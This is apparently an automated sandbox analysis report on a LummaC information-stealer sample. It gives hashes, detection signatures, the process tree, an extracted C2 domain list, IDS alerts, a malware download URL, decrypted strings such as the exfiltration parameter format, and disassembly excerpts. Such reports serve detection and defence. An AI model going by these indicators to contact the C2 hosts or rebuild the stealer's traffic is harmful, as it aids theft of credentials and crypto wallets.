Edit tour

Windows Analysis Report
NDWffRLk7z.exe

Overview

General Information

Sample name:	NDWffRLk7z.exe renamed because original name is a hash value
Original sample name:	9f08d109672d30fdd700843d3518d0e4.exe
Analysis ID:	1589516
MD5:	9f08d109672d30fdd700843d3518d0e4
SHA1:	c5466728ead0dcab899503b5ace7b205b26315bd
SHA256:	f92fa8e4adeea867c8fd03a3951faad0c272adcf752646ecd6c80d41f66f34d8
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

NDWffRLk7z.exe (PID: 4468 cmdline: "C:\Users\user\Desktop\NDWffRLk7z.exe" MD5: 9F08D109672D30FDD700843D3518D0E4)

89AC.tmp.exe (PID: 7252 cmdline: "C:\Users\user\AppData\Local\Temp\89AC.tmp.exe" MD5: 08494E6A1E788EA3259955A4524FDFEC)

WerFault.exe (PID: 7392 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7252 -s 1656 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["versersleep.shop", "femalsabler.shop", "chipdonkeruz.shop", "handscreamny.shop", "crowdwarek.shop", "soundtappysk.shop", "apporholis.shop", "skidjazzyric.click", "robinsharez.shop"], "Build id": "4h5VfH--"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.1601705036.0000000000793000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xd58:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.3748774798.000000000058A000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1400:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:10.007203+0100	2028371	3	Unknown Traffic	192.168.2.11	49730	104.102.49.254	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:09.133793+0100	2059035	1	Domain Observed Used for C2 Detected	192.168.2.11	57398	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:09.167609+0100	2059037	1	Domain Observed Used for C2 Detected	192.168.2.11	50434	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:09.147874+0100	2059039	1	Domain Observed Used for C2 Detected	192.168.2.11	62856	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:09.123270+0100	2059041	1	Domain Observed Used for C2 Detected	192.168.2.11	56412	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:09.179427+0100	2059043	1	Domain Observed Used for C2 Detected	192.168.2.11	61343	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:09.266467+0100	2059049	1	Domain Observed Used for C2 Detected	192.168.2.11	56135	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:09.096843+0100	2059088	1	Domain Observed Used for C2 Detected	192.168.2.11	53943	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:09.109909+0100	2059051	1	Domain Observed Used for C2 Detected	192.168.2.11	55202	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:09.158120+0100	2059057	1	Domain Observed Used for C2 Detected	192.168.2.11	53151	1.1.1.1	53	UDP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:05.148340+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49707	172.67.179.207	443	TCP
2025-01-12T17:47:05.960866+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49709	176.113.115.19	80	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:47:10.488652+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.11	49730	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: NDWffRLk7z.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEPL	Avira URL Cloud: Label: malware
Source: http://176.113.115.19/ScreenUpdateSync.exe#	Avira URL Cloud: Label: malware

Found malware configuration

Source: 7.3.89AC.tmp.exe.2170000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["versersleep.shop", "femalsabler.shop", "chipdonkeruz.shop", "handscreamny.shop", "crowdwarek.shop", "soundtappysk.shop", "apporholis.shop", "skidjazzyric.click", "robinsharez.shop"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: NDWffRLk7z.exe	Virustotal: Detection: 40%			Perma Link
Source: NDWffRLk7z.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: NDWffRLk7z.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: robinsharez.shop
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: handscreamny.shop
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: chipdonkeruz.shop
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: versersleep.shop
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crowdwarek.shop
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: apporholis.shop
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: femalsabler.shop
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: soundtappysk.shop
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: skidjazzyric.click
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000007.00000003.1365652249.0000000002170000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Unpacked PE file: 4.2.NDWffRLk7z.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Unpacked PE file: 7.2.89AC.tmp.exe.400000.0.unpack

Source: NDWffRLk7z.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.11:49730 version: TLS 1.2

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_004389E2 FindFirstFileExW,		4_2_004389E2
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02148C49 FindFirstFileExW,		4_2_02148C49

Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, edx	7_2_0040B2B0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	7_2_00419840
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	7_2_0040A05C
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	7_2_00427070
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], edx	7_2_0043B870
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov edx, ecx	7_2_0043B870
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	7_2_0042D830
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	7_2_0043F0E0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0041B882
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then jmp eax	7_2_004418A0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0041B173
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	7_2_0042B170
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_0041A900
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0041B184
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then test esi, esi	7_2_0043C9A0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [ecx], al	7_2_0041B243
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0042EA62
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	7_2_00402210
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_0040AA32
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]	7_2_00425AF0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_00428280
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	7_2_0041F2A0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ebx, eax	7_2_00405AB0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ebp, eax	7_2_00405AB0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0042EB5F
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_0042BB00
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0041BB21
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	7_2_00441B20
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	7_2_0041AB2A
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]	7_2_0040C334
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]	7_2_0040C3EC
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ebx, edx	7_2_0042DBF0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then jmp ecx	7_2_0040D334
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	7_2_00422380
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]	7_2_0041BBA0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov dword ptr [ebx], 00000022h	7_2_0042BBA0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0042EBA1
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_00440BAB
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0042EBB3
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	7_2_00441BB0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	7_2_00441C40
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_00442470
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	7_2_00426C76
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov eax, edi	7_2_0041C400
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	7_2_00417405
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]	7_2_00417405
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov edx, ecx	7_2_00417405
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	7_2_00414C20
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h	7_2_0044042D
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_0044042D
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	7_2_0041B484
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	7_2_00427490
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	7_2_00425D6A
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	7_2_00438520
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh	7_2_00442D20
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then push edi	7_2_0043C5A0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]	7_2_0043C5A0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	7_2_0042B652
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	7_2_0041B667
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [0044C548h]	7_2_00418672
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_00409E09
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	7_2_00407620
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	7_2_00407620
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then jmp ecx	7_2_0040CEC7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]	7_2_00416ED0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]	7_2_0041BEE1
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0041AEFF
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov esi, ecx	7_2_00415720
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_00415720
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]	7_2_0040DFE2
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [eax], cl	7_2_0040DFE2
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]	7_2_00408F90
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	7_2_004427B0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]	7_2_0212E249
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [eax], cl	7_2_0212E249
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	7_2_0212A2C3
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	7_2_0215F347
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0213B3DA
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0213B3EB
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_0212A070
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov esi, ecx	7_2_021360EF
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]	7_2_02137137
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then jmp ecx	7_2_0212D12E
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]	7_2_0213C148
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0213B166
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]	7_2_021291F7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	7_2_021621EA
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then jmp ecx	7_2_0212D59B
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov eax, edi	7_2_0213C667
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h	7_2_02160694
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_02160694
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_021626D7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	7_2_021476F7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	7_2_0213B6EB
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	7_2_0213773F
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	7_2_02158787
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	7_2_02122477
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [ecx], al	7_2_0213B4AA
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_021484E7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	7_2_0213F507
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]	7_2_0212C59B
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	7_2_021425E7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	7_2_02162A17
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, edx	7_2_0212BA6C
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	7_2_0214DA97
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	7_2_02139AA7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], edx	7_2_0215BAD7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov edx, ecx	7_2_0215BAD7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]	7_2_02137AE4
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov edx, ecx	7_2_02137AE4
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0213BAE9
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_0213AB67
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	7_2_02146BA7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then push edi	7_2_0215C807
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]	7_2_0215C807
